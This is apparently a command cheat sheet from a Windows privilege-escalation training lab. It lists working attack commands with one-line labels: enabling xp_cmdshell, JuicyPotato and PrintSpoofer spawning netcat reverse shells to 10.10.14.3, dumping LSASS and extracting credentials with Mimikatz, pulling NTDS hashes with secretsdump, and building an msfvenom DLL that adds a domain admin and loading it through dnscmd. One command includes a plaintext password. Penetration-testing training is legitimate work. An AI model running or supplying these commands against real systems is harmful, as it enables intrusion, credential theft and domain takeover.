Handy Commands
Handy Commands
1. Connect using mssqlclient.py
Command:
mssqlclient.py sql_dev@10.129.43.30 -windows-authDescription: Connect using mssqlclient.py
2. Enable xp_cmdshell
Command:
EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;Description: Enable xp_cmdshell
3. Run OS commands with xp_cmdshell
Command:
xp_cmdshell 'whoami'Description: Run OS commands with xp_cmdshell
4. Escalate privileges with JuicyPotato
Command:
c:\tools\JuicyPotato.exe -l 53375 -p c:\windows\system32\cmd.exe -a "/c c:\tools\nc.exe 10.10.14.3 443 -e cmd.exe" -t *Description: Escalate privileges with JuicyPotato
5. Escalating privileges with PrintSpoofer
Command:
c:\tools\PrintSpoofer.exe -c "c:\tools\nc.exe 10.10.14.3 8443 -e cmd"Description: Escalate privileges with PrintSpoofer
6. Take memory dump with ProcDump
Command:
procdump.exe -accepteula -ma lsass.exe lsass.dmpDescription: Take memory dump with ProcDump
7. Extract credentials from LSASS dump using Mimikatz
Command:
sekurlsa::minidump lsass.dmp
sekurlsa::logonpasswordsDescription: Use MimiKatz to extract credentials from LSASS memory dump
8. Checking ownership of a file
Command:
dir /q C:\backups\wwwroot\web.configDescription: Check ownership of a file
9. Taking ownership of a file
Command:
takeown /f C:\backups\wwwroot\web.configDescription: Take ownership of a file
10. Confirm changed ownership of a file
Command:
Get-ChildItem -Path 'C:\backups\wwwroot\web.config' | select name,directory, @{Name="Owner";Expression={(Get-ACL $_.Fullname).Owner}}Description: Confirm changed ownership of a file
11. Modifying a file ACL
Command:
icacls "C:\backups\wwwroot\web.config" /grant htb-student:FDescription: Modify a file ACL
12. Extract hashes with secretsdump.py
Command:
secretsdump.py -ntds ntds.dit -system SYSTEM -hashes lmhash:nthash LOCALDescription: Extract hashes with secretsdump.py
13. Copy files with ROBOCOPY
Command:
robocopy /B E:\Windows\NTDS .\ntds ntds.ditDescription: Copy files with ROBOCOPY
14. Searching security event logs
Command:
wevtutil qe Security /rd:true /f:text | Select-String "/user"Description: Search security event logs
15. Passing credentials to wevtutil
Command:
wevtutil qe Security /rd:true /f:text /r:share01 /u:julie.clay /p:Welcome1 | findstr "/user"Description: Pass credentials to wevtutil
16. Searching event logs with PowerShell
Command:
Get-WinEvent -LogName security | where { $_.ID -eq 4688 -and $_.Properties[8].Value -like '*/user*' } | Select-Object @{name='CommandLine';expression={ $_.Properties[8].Value }}Description: Search event logs with PowerShell
17. Generate malicious DLL
Command:
msfvenom -p windows/x64/exec cmd='net group "domain admins" netadm /add /domain' -f dll -o adduser.dllDescription: Generate malicious DLL
18. Loading a custom DLL with dnscmd
Command:
dnscmd.exe /config /serverlevelplugindll adduser.dllDescription: Load a custom DLL with dnscmd
19. Finding a user's SID
Command:
wmic useraccount where name="netadm" get sidDescription: Find a user's SID
20. Checking permissions on DNS service
Command:
sc.exe sdshow DNSDescription: Check permissions on DNS service
21. Stopping a service
Command:
sc stop dnsDescription: Stop a service
22. Starting a service
Command:
sc start dnsDescription: Start a service
23. Querying a registry key
Command:
reg query \\10.129.43.9\HKLM\SYSTEM\CurrentControlSet\Services\DNS\ParametersDescription: Query a registry key
Last updated